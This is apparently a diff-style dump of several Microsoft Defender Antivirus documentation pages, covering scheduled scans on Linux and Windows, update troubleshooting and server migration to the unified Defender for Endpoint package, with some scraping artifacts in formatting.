- echo $(date) "Time Scan Finished" >>/logs/mdav_avacron_full_scan.log
- exit 0
- ~
-
- Press Esc
-
- Type: wq!
- ```
-
-1. Change the file permissions to allow the file to be executed.
-
- ```shell
- Chmod 755 mdavfullscan
-
- ls -la
- ```
-
- :::image type="content" source="mediavfullscan.png" alt-text="7. Change file permissions":::
-
- ```shell
- [root@redhat7 cron.weekly]# ls -la
- total 16
- drwxr - xr - x. 2 root root 26 Jun 14 19:19 .
- drwxr - xr - x. 85 root root 8192 Jun 14 19:01 ..
- - rw - r
- [root@redhat7 cron.weekly] # chmod 755 mdavfullscan
- [root@redhat7 cron.weekly] # ls -lh
- total 4. 0k
- - rwxr - xr - x. 1 root root 128 Jun 14 19:19 mdavfullscan
- [root@redhat7 cron.weekly] #
- ```
-
-1. Use the command to test the weekly anacron job.
-
- ```shell
- ./mdavfullscan
- ```
-
-1. Use the command to verify the job ran successfully.
-
- ```shell
- cat /logs/mdav_avacron_full_scan.log
- ```
-
- :::image type="content" source="media/mdav-avacron-full-scan-log.png" alt-text="verify the job ran":::
-
- ```shell
- [root@redhat7 cron.weekly] # cat /logs/mdav_avacron_full_scan.log
- Tue Jun 14 20:20:44 UTC 2022 Time Scan Begins
- Scan has finished
- 66547 file(s) scanned
- 0 threat(s) detected
- Tue Jun 14 20:20:50 UTC 2022 Time Scan Finished
- [root@redhat7 cron.weekly] #
- ```
--
security Schedule Antivirus Scans Group Policy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans-group-policy.md
- Title: Schedule antivirus scans using Group Policy
-description: Use Group Policy to set up antivirus scans
---- Previously updated : 03/06/2023------- m365-security-- tier2-- mde-ngp--
-# Schedule antivirus scans using Group Policy
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-This article describes how to configure scheduled scans using Group Policy. To learn more about scheduling scans and about scan types, see [Configure scheduled quick or full Microsoft Defender Antivirus scans](schedule-antivirus-scans.md).
-
-## Configure antivirus scans using Group Policy
-
-1. On your Group Policy management machine, in the Group Policy Editor, go to **Computer configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Scan**.
-
-2. Right-click the Group Policy Object you want to configure, and then select **Edit**.
-
-3. Specify settings for the Group Policy Object, and then select **OK**.
-
-4. Repeat steps 1-4 for each setting you want to configure.
-
-5. Deploy your Group Policy Object as you normally do. If you need help with Group Policy Objects, see [Create a Group Policy Object](/windows/security/threat-protection/windows-firewall/create-a-group-policy-object).
-
-> [!NOTE]
-> When configuring scheduled scans, the setting **Start the scheduled scan only when computer is on but not in use**, which is enabled by default, can impact the expected scheduled time by requiring the machine to be idle first.
->
-> For weekly scans, default behavior on Windows Server is to scan outside of automatic maintenance when the machine is idle. The default on Windows 10 and later is to scan during automatic maintenance when the machine is idle. To change this behavior, modify the settings by disabling **ScanOnlyIfIdle**, and then define a schedule.
-
-For more information, see the [Manage when protection updates should be downloaded and applied](manage-protection-update-schedule-microsoft-defender-antivirus.md) and [Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md) topics.
-
-## Group Policy settings for scheduling scans
-
-| Location | Setting | Description | Default setting (if not configured) |
-|:|:|:|:|
-| Scan | Specify the scan type to use for a scheduled scan | Quick scan |
-| Scan | Specify the day of the week to run a scheduled scan | Specify the day (or never) to run a scan. | Never |
-| Scan | Specify the time of day to run a scheduled scan | Specify the number of minutes after midnight (for example, enter **60** for 1 a.m.). | 2 a.m. |
-| Root | Randomize scheduled task times |In Microsoft Defender Antivirus, randomize the start time of the scan to any interval from 0 to 23 hours. By default, scheduled tasks will begin at a random time within four hours of the time specified in Task Scheduler. | Enabled |
-
-## Group Policy settings for scheduling scans for when an endpoint is not in use
-
-| Location | Setting | Description | Default setting (if not configured) |
-|:|:|:|:|
-| Scan | Start the scheduled scan only when computer is on but not in use | Scheduled scans will not run, unless the computer is on but not in use | Enabled |
-
-> [!NOTE]
-> When you schedule scans for times when endpoints are not in use, scans do not honor the CPU throttling configuration and will take full advantage of the resources available to complete the scan as fast as possible.
-
-## Group Policy settings for scheduling remediation-required scans
-
-| Location | Setting | Description | Default setting (if not configured) |
-|||||
-| Remediation | Specify the day of the week to run a scheduled full scan to complete remediation | Specify the day (or never) to run a scan. | Never |
-| Remediation | Specify the time of day to run a scheduled full scan to complete remediation | Specify the number of minutes after midnight (for example, enter **60** for 1 a.m.) | 2 a.m. |
-
-## Group Policy settings for scheduling daily scans
-
-| Location | Setting | Description | Default setting (if not configured) |
-|:|:|:|:|
-| Scan | Specify the interval to run quick scans per day | Specify how many hours should elapse before the next quick scan. For example, to run every two hours, enter **2**, for once a day, enter **24**. Enter **0** to never run a daily quick scan. | Never |
-| Scan | Specify the time for a daily quick scan | Specify the number of minutes after midnight (for example, enter **60** for 1 a.m.) | 2 a.m. |
-
-## Group Policy settings for scheduling scans after protection updates
-
-| Location | Setting | Description | Default setting (if not configured)|
-|:|:|:|:|
-| Signature updates | Turn on scan after Security intelligence update | A scan will occur immediately after a new protection update is downloaded | Enabled |
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Schedule Antivirus Scans Powershell https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans-powershell.md
- Title: Schedule antivirus scans using PowerShell
-description: Schedule antivirus scans using PowerShell
---- Previously updated : 10/18/2021------- m365-security-- tier2-- mde-ngp--
-# Schedule antivirus scans using PowerShell
-
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender for Business-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-- Windows Server-
-This article describes how to configure scheduled scans using PowerShell cmdlets. To learn more about scheduling scans and about scan types, see [Configure scheduled quick or full Microsoft Defender Antivirus scans](schedule-antivirus-scans.md).
-
-## Use PowerShell cmdlets to schedule scans
-
-Use the following cmdlets:
-
-```PowerShell
-Set-MpPreference -ScanParameters
-Set-MpPreference -ScanScheduleDay
-Set-MpPreference -ScanScheduleTime
-Set-MpPreference -RandomizeScheduleTaskTimes
-
-```
-
-For more information, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/) for more information on how to use PowerShell with Microsoft Defender Antivirus.
-
-## PowerShell cmdlets for scheduling scans when an endpoint is not in use
-
-Use the following cmdlets:
-
-```PowerShell
-Set-MpPreference -ScanOnlyIfIdleEnabled
-```
-
-For more information, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/).
-
-> [!NOTE]
-> When you schedule scans for times when endpoints are not in use, scans do not honor the CPU throttling configuration and will take full advantage of the resources available to complete the scan as fast as possible.
-
-## PowerShell cmdlets for scheduling scans to complete remediation
-
-Use the following cmdlets:
-
-```PowerShell
-Set-MpPreference -RemediationScheduleDay
-Set-MpPreference -RemediationScheduleTime
-```
-
-See [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/) for more information on how to use PowerShell with Microsoft Defender Antivirus.
-
-## PowerShell cmdlets for scheduling daily scans
-
-Use the following cmdlets:
-
-```PowerShell
-Set-MpPreference -ScanScheduleQuickScanTime
-```
-
-For more information about how to use PowerShell with Microsoft Defender Antivirus, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Schedule Antivirus Scans Wmi https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans-wmi.md
- Title: Schedule antivirus scans using Windows Management Instrumentation
-description: Schedule antivirus scans using WMI
---- Previously updated : 02/21/2024------- m365-security-- tier3-- mde-ngp--
-# Schedule antivirus scans using Windows Management Instrumentation (WMI)
-
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-- Windows Server-
-This article describes how to configure scheduled scans using WMI. To learn more about scheduling scans and about scan types, see [Configure scheduled quick or full Microsoft Defender Antivirus scans](schedule-antivirus-scans.md).
-
-## Use Windows Management Instruction (WMI) to schedule scans
-
-Use the [**Set** method of the **MSFT_MpPreference**](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class for the following properties:
-
-```WMI
-ScanParameters
-ScanScheduleDay
-ScanScheduleTime
-RandomizeScheduleTaskTimes
-```
-
-For more information and allowed parameters, see [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal)
-
-## WMI for scheduling scans when an endpoint is not in use
-
-Use the [Set method of the MSFT_MpPreference class](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) for the following properties:
-
-```WMI
-ScanOnlyIfIdleEnabled
-```
-
-For more information about APIs and allowed parameters, see [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal).
-
-> [!NOTE]
-> When you schedule scans for times when endpoints are not in use, scans do not honor the CPU throttling configuration and will take full advantage of the resources available to complete the scan as fast as possible.
--
-## WMI for scheduling scans to complete remediation
-
-Use the [**Set** method of the **MSFT_MpPreference**](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class for the following properties:
-
-```WMI
-RemediationScheduleDay
-RemediationScheduleTime
-```
-
-For more information and allowed parameters, see [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal).
-
-## WMI for scheduling daily scans
-
-Use the [**Set** method of the **MSFT_MpPreference**](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class for the following properties:
-
-```WMI
-ScanScheduleQuickScanTime
-```
-
-For more information and allowed parameters, see [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Schedule Antivirus Scans https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans.md
- Title: Schedule regular quick and full scans with Microsoft Defender Antivirus
-description: Set up recurring (scheduled) scans, including when they should run and whether they run as full or quick scans
---- Previously updated : 04/10/2024------- m365-security-- tier3-- mde-ngp--
-# Configure scheduled quick or full Microsoft Defender Antivirus scans
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-You can set up regular, scheduled antivirus scans on devices. These scheduled scans are in addition to always-on, real-time protection and [on-demand antivirus](run-scan-microsoft-defender-antivirus.md) scans. When you schedule a scan, you can specify the type of scan, when the scan should occur, and if the scan should occur after a [protection update](manage-protection-updates-microsoft-defender-antivirus.md) or when a device isn't being used. You can also set up special scans to complete remediation actions if needed.
-
-## Comparing the quick scan, full scan, and custom scan
-
-The following table describes the different types of scans you can configure.
-
-| Scan type | Description |
-|:|:|
-| Quick scan <br/>(*recommended*) | A quick scan looks at all the locations where there could be malware registered to start with the system, such as registry keys and known Windows startup folders. <br/><br/>A quick scan helps provide strong protection against malware that starts with the system and kernel-level malware, together with [always-on real-time protection](configure-real-time-protection-microsoft-defender-antivirus.md), which reviews files when they're opened and closed, and whenever a user navigates to a folder.<br/><br/>In most cases, a quick scan is sufficient and is the recommended option for scheduled scans. Starting with the December 2023 (4.18.2311.x.x) release of Platform Update, you have the option to scan all files and directories that are excluded from real-time protection using contextual exclusions are scanned during a quick scan.|
-| Full scan | A full scan starts by running a quick scan and then continues with a sequential file scan of all mounted fixed disks and removable/network drives (if the full scan is configured to do so).<br/><br/>A full scan can take a few hours or days to complete, depending on the amount and type of data that needs to be scanned.<br/><br/>When a full scan begins, it uses the security intelligence definitions installed at the time the scan starts. If new security intelligence updates are made available during the full scan, another full scan is required in order to scan for new threat detections contained in the latest update.<br/><br/>Because of the time and resources involved in a full scan, in general, we don't recommend scheduling full scans.|
-| Custom scan | A custom scan runs on files and folders that you specify. For example, you can choose to scan a USB drive or a specific folder on your device's local drive.|
-
-> [!NOTE]
-> By default, quick scans run on mounted removable devices, such as USB drives.
-
-> [!TIP]
-> If you have a Network-Attached Storage (NAS) or Storage Area Network (SAN), you can use Internet Content Adaption Protocol (ICAP) scanning with the Microsoft Defender Antivirus engine. For more information, see [Tech Community Blog: MetaDefender ICAP with Windows Defender Antivirus: World-class security for hybrid environments](https://techcommunity.microsoft.com/t5/windows-it-pro-blog/metadefender-icap-with-windows-defender-antivirus-world-class/ba-p/800234).
-
-## How to choose a scan type
-
-Use the following table to choose a scan type.
-
-|Scenario|Recommended scan type|
-|||
-|You want to set up regular, scheduled scans|Quick scan <br/><br/> A quick scan checks the processes, memory, profiles, and certain locations on the device. Together with [always-on real-time protection](configure-real-time-protection-microsoft-defender-antivirus.md), a quick scan helps provide strong coverage both for malware that starts with the system and kernel-level malware. Real-time protection reviews files when they're opened and closed, and whenever a user navigates to a folder.|
-|Threats, such as malware, are detected on an individual device|Quick scan <br/><br/> In most cases, a quick scan will catch and clean up detected malware.|
-|You want to run an [on-demand scan](run-scan-microsoft-defender-antivirus.md)|Quick scan|
-|You want to make sure a portable device, such as a USB drive, doesn't contain malware|Custom scan <br/><br/> A custom scan enables you to select specific locations, folders, or files, and runs a quick scan.|
-| You have installed or re-enabled Microsoft Defender Antivirus | Quick scan or full scan <br/><br/>A quick scan checks the processes, memory, profiles, and certain locations on the device. If you prefer, you can choose to run a full scan after you have enabled or installed Microsoft Defender Antivirus. Just keep in mind it can take a while to run a full scan. |
-
-## Important points to keep in mind
--- By default, Microsoft Defender Antivirus checks for an update 15 minutes before the time of any scheduled scans. You can [manage the schedule for when protection updates should be downloaded and applied](manage-protection-update-schedule-microsoft-defender-antivirus.md) to override this default.--- If a device is unplugged and running on battery during a scheduled full scan, the scheduled scan stops with event 1002, which states that the scan stopped before completion. Microsoft Defender Antivirus runs a full scan at the next scheduled time.--- Scheduled scans run according to the local time zone of the device.--- Malicious files can be stored in locations that aren't included in a quick scan. However, [always-on, real-time protection](configure-protection-features-microsoft-defender-antivirus.md) reviews all files that are opened & closed, and any files that are in folders that are accessed by a user. The combination of real-time protection and a quick scan helps provide strong protection against malware.--- On-access protection with [cloud-delivered protection](cloud-protection-microsoft-defender-antivirus.md) helps ensure that all the files accessed on the system are being scanned with the latest security intelligence and cloud machine learning models.--- When real-time protection detects malware and the extent of the affected files isn't determined initially, Microsoft Defender Antivirus initiates a full scan as part of the remediation process.--- If a device is offline for an extended period of time, a full scan can take longer to complete.--- You can configure quick scans to scan real-time protection exclusions by using PowerShell, Intune, or Group Policy.-
-## Scheduled quick scan performance optimization
-
-As a performance optimization, Microsoft Defender Antivirus skips running scheduled quick scans in some situations. This optimization only applies to a quick scan when initiated by a schedule ΓÇô it doesn't affect a quick scan initiated by an [on-demand antivirus](run-scan-microsoft-defender-antivirus.md) scan. This optimization reduces performance degradation by avoiding running a quick scan when it isn't necessary and won't affect protection.
-
-By default, if a qualified quick scan ran within the last seven days, a new quick scan won't be initiated. A quick scan is considered to be *qualified* if:
--- The scan occurs after the last [Security Intelligence Update](microsoft-defender-antivirus-updates.md) was installed; -- [Real-time protection](configure-protection-features-microsoft-defender-antivirus.md) wasn't disabled during that time period; and, -- The machine was rebooted. -
-This optimization *doesn't* apply to the following conditions:
--- If Microsoft Defender for Endpoint is [Managed](configuration-management-reference-microsoft-defender-antivirus.md) -- If Microsoft Defender [Endpoint Detection and Response (EDR)](overview-endpoint-detection-response.md) is installed -- If the computer was restarted since the last quick scan-- If [real-time protection](configure-real-time-protection-microsoft-defender-antivirus.md) is disabled after the last quick scan occurred -- If the last initiated quick scan wasn't completed-
-This optimization applies to machines running Windows 10 Anniversary Update (version 1607) and all subsequent Windows releases, as well as Windows Server 2016 (version 1607) and subsequent Windows Server releases, but doesn't apply to Core Server installations.
-
-## See also
--- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Onboard non-Windows devices](configure-endpoints-non-windows.md)
security Security Intelligence Update Tshoot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/security-intelligence-update-tshoot.md
- Title: Security Intelligence update troubleshooting from Microsoft Update source
-description: Learn how to troubleshoot security intelligence updates from your Microsoft Update source.
--- Previously updated : 04/10/2024------- partner-contribution---
-# Troubleshooting Security Intelligence Updates from Microsoft Update source
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 1 and 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-- Microsoft Defender Antivirus-
-Use this article to learn how to troubleshoot security intelligence updates for Microsoft Defender Antivirus when the first source is from Microsoft Update (formerly known as Windows Update). Follow these steps to troubleshoot issues with getting your security intelligence updates:
-
-1. Make sure that the URLs needed for security intelligence updates are allowed thru the firewall or proxy. See the Defender for Endpoint URL spreadsheets in [Configure your network environment to ensure connectivity with Defender for Endpoint service](configure-environment.md).
-
- If you're only using Microsoft Defender Antivirus, see the **Windows Update** section in [Manage connection endpoints for Windows 11 Enterprise](/windows/privacy/manage-windows-11-endpoints).
-
-2. Make sure that the URLs you reviewed during the previous step aren't SSL inspected. Otherwise, you might see the following error in the event log:
-
- ```properties
-
- Source: Windows Defender
-
- Event ID: 2001
-
- Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
-
- Error code: 0x80072ee7
-
- Error description: The server name or address could not be resolved.
-
- ```
-
- What is error code `0x80072ee7`?
-
- ```properties
-
- C:\>err 0x80072ee7
-
- # as an HRESULT: Severity: FAILURE (1), Facility: 0x7, Code 0x2ee7
-
- # for hex 0x2ee7 / decimal 12007 :
-
- ERROR_INTERNET_NAME_NOT_RESOLVED inetmsg.h
-
- ERROR_INTERNET_NAME_NOT_RESOLVED wininet.h
-
- ```
-
-3. Make sure that the services needed for Windows Update are started. These services include:
-
- - Windows Update service
-
- - Background Intelligence Transfer Service (BITS)
-
-4. If you're using a [Fallback order](/microsoft-365/security/defender-endpoint/manage-protection-updates-microsoft-defender-antivirus) policy, make sure that *Microsoft Update* (`MicrosoftUpdateServer`) is the first item in the list.
-
-5. Gather diagnostic data from the [Microsoft Defender for Endpoint Client Analyzer tool](download-client-analyzer.md).
-
- - If you have Microsoft Defender for Endpoint Plan 2 and access to Live Response, you can gather the diagnostic data remotely. See [Collect support logs in Microsoft Defender for Endpoint using live response](troubleshoot-collect-support-log.md).
-
- - If you have Microsoft Defender for Endpoint Plan 1 or only Microsoft Defender Antivirus, you can gather the diagnostic data using the client analyzer on Windows. See [Run the client analyzer on Windows](run-analyzer-windows.md).
-
- - If either method doesn't work for you, use Microsoft Defender Antivirus diagnostic data collection. See [Collect Microsoft Defender Antivirus diagnostic data](collect-diagnostic-data.md).
-
-6. When you have your diagnostic data, convert the `WindowsUpdate.etl` logs into a human readable format by using the PowerShell command, [Get-WindowsUpdateLog](/powershell/module/windowsupdate/get-windowsupdatelog). Use that information to troubleshoot issues with security intelligence updates.
-
-## See also
--- [Troubleshoot Microsoft Defender Antivirus settings](troubleshoot-settings.md)--- [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)
security Server Migration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/server-migration.md
- Title: Server migration scenarios for the new version of Microsoft Defender for Endpoint
-description: Read this article to get an overview of how to migrate your servers from the previous, MMA-based solution to the current Defender for Endpoint unified solution package.
--- Previously updated : 09/19/2022---- m365-security-- tier2-----
-# Server migration scenarios from the previous, MMA-based Microsoft Defender for Endpoint solution
--
-**Applies to:**
-- Windows Server 2012 R2-- Windows Server 2016-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> [!NOTE]
-> Always ensure the operating system, and Microsoft Defender Antivirus on Windows Server 2016, are fully updated before proceeding with installation or upgrade. To receive regular product improvements and fixes for the EDR Sensor component, ensure Windows Update [KB5005292](https://go.microsoft.com/fwlink/?linkid=2168277) gets applied or approved after installation. In addition, to keep protection components updated, please reference [Manage Microsoft Defender Antivirus updates and apply baselines](/microsoft-365/security/defender-endpoint/manage-updates-baselines-microsoft-defender-antivirus#monthly-platform-and-engine-versions).
-
-These instructions apply to the new unified solution and installer (MSI) package of Microsoft Defender for Endpoint for Windows Server 2012 R2 and Windows Server 2016. This article contains high-level instructions for various possible migration scenarios from the previous to the current solution. These high-level steps are intended as guidelines to be adjusted to the deployment and configuration tools available in your environment.
-
-**If you are using Microsoft Defender for Cloud to perform deployment, you can automate installation and upgrade. See [Defender for Servers Plan 2 now integrates with MDE unified solution](https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/defender-for-servers-plan-2-now-integrates-with-mde-unified/ba-p/3527534)**
-
-> [!NOTE]
-> Operating system upgrades with Microsoft Defender for Endpoint installed are not supported. Please offboard and uninstall, upgrade the operating system, then proceed with installation.
-
-## Installer script
-
-> [!NOTE]
-> Make sure the machines you run the script on is not blocking the execution of the script. The recommended execution policy setting for PowerShell is Allsigned. This requires importing the script's signing certificate into the Local Computer Trusted Publishers store if the script is running as SYSTEM on the endpoint.
-
-To facilitate upgrades when Microsoft Endpoint Configuration Manager is not yet available or updated to perform the automated upgrade, you can use this [upgrade script](https://github.com/microsoft/mdefordownlevelserver/archive/refs/heads/main.zip). Download it by selection the "Code" button and downloading the .zip file, then extracting install.ps1. It can help automate the following required steps:
-
-1. Remove the OMS workspace for Microsoft Defender for Endpoint (OPTIONAL).
-2. Remove System Center Endpoint Protection (SCEP) client if installed.
-3. Download and install [prerequisites](configure-server-endpoints.md#prerequisites) if required.
-4. Enable and update the Defender Antivirus feature on Windows Server 2016
-5. Install Microsoft Defender for Endpoint.
-6. Apply the onboarding script **for use with Group Policy** downloaded from [Microsoft Defender XDR](https://security.microsoft.com).
-
-To use the script, download it to an installation directory where you have also placed the installation and onboarding packages (see [Configure server endpoints](configure-server-endpoints.md)).
-
-EXAMPLE: .\install.ps1 -RemoveMMA <YOUR_WORKSPACE_ID> -OnboardingScript ".\WindowsDefenderATPOnboardingScript.cmd"
-
-For more information on how to use the script, use the PowerShell command "get-help .\install.ps1".
-
-## Microsoft Endpoint Configuration Manager migration scenarios
-
-> [!NOTE]
-> You'll need Microsoft Endpoint Configuration Manager, version 2107 or later to perform Endpoint Protection policy configuration. From [version 2207 or later](/mem/configmgr/core/plan-design/changes/whats-new-in-version-2207#improved-microsoft-defender-for-endpoint-mde-onboarding-for-windows-server-2012-r2-and-windows-server-2016) deployment and upgrades can be fully automated.
-
-For instructions on how to migrate using Microsoft Endpoint Configuration Manager older than version 2207 please see [Migrating servers from Microsoft Monitoring Agent to the unified solution.](/microsoft-365/security/defender-endpoint/application-deployment-via-mecm)
-
-## If you are running a non-Microsoft antivirus solution
-
-1. Fully update the machine including Microsoft Defender Antivirus (Windows Server 2016) ensuring [prerequisites](configure-server-endpoints.md#prerequisites) have been met. For more information on the prerequisites that have to be met, see [Prerequisites for Windows Server 2016](configure-server-endpoints.md#prerequisites-for-windows-server-2016).
-2. Ensure third-party antivirus management no longer pushes antivirus agents to these machines.*
-3. Author your policies for the protection capabilities in Microsoft Defender for Endpoint and target those to the machine in the tool of your choice.
-4. Install the Microsoft Defender for Endpoint for Windows Server 2012 R2 and 2016 package and **enable passive mode**. See [Install Microsoft Defender Antivirus using command line](configure-server-endpoints.md#install-microsoft-defender-for-endpoint-using-the-command-line).
- a. Apply the onboarding script **for use with Group Policy** downloaded from [Microsoft Defender XDR](https://security.microsoft.com).
-5. Apply updates.
-6. Remove your non-Microsoft antivirus software by either using the non-Microsoft antivirus console or by using Microsoft Endpoint Configuration Manager as
-appropriate. Make sure to remove passive mode configuration.*
-
-> [!TIP]
-> You can use the [installer-script](server-migration.md#installer script) as part of your application to automate the above steps. To enable passive mode, apply the -Passive flag. For example, .\install.ps1 -RemoveMMA <YOUR_WORKSPACE_ID> -OnboardingScript ".\WindowsDefenderATPOnboardingScript.cmd" -Passive
-
-*These steps only apply if you intend to replace your non-Microsoft antivirus solution. See [Better together: Microsoft Defender Antivirus and Microsoft Defender for Endpoint](why-use-microsoft-defender-antivirus.md).
-
-To move a machine out of passive mode, set the following key to 0:
-
-Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
-Name: ForceDefenderPassiveMode
-Type: REG_DWORD
-Value: 0
-
-## If you are running System Center Endpoint Protection but are not managing the machine using Microsoft Endpoint Configuration Manager (MECM/ConfigMgr)
-
-1. Fully update the machine including Microsoft Defender Antivirus (Windows Server 2016) ensuring [prerequisites](configure-server-endpoints.md#prerequisites) have been met.
-2. Create and apply policies using Group Policy, PowerShell, or a 3rd party management solution.
-3. Uninstall System Center Endpoint Protection (Windows Server 2012 R2).
-4. Install Microsoft Defender for Endpoint (see [Configure server endpoints](configure-server-endpoints.md).)
-5. Apply the onboarding script **for use with Group Policy** downloaded from [Microsoft Defender XDR](https://security.microsoft.com).
-6. Apply updates.
-
-> [!TIP]
-> You can use the installer script to automate the above steps.
-
-## Microsoft Defender for Cloud scenarios
-
-### You're using Microsoft Defender for Cloud. The Microsoft Monitoring Agent (MMA) and/or Microsoft Antimalware for Azure (SCEP) are installed and you want to upgrade.
-
-If you're using Microsoft Defender for Cloud, you can leverage the automated upgrade process. See [Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft Defender for Endpoint](/azure/security-center/security-center-wdatp#enable-the-microsoft-defender-for-endpoint-integration).
-
-## Group Policy configuration
-
-For configuration using Group Policy, ensure you're using the latest ADMX files in your central store to access the correct Defender for Endpoint policy options. Please reference [How to create and manage the Central Store for Group Policy Administrative Templates in Windows](/troubleshoot/windows-client/group-policy/create-and-manage-central-store) and download the latest files **for use with Windows 10**.
security Specify Cloud Protection Level Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/specify-cloud-protection-level-microsoft-defender-antivirus.md
- Title: Specify the cloud protection level for Microsoft Defender Antivirus
-description: Set your level of cloud protection for Microsoft Defender Antivirus.
---- Previously updated : 04/11/2023------- m365-security-- tier2-- mde-ngp--
-# Specify the cloud protection level
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
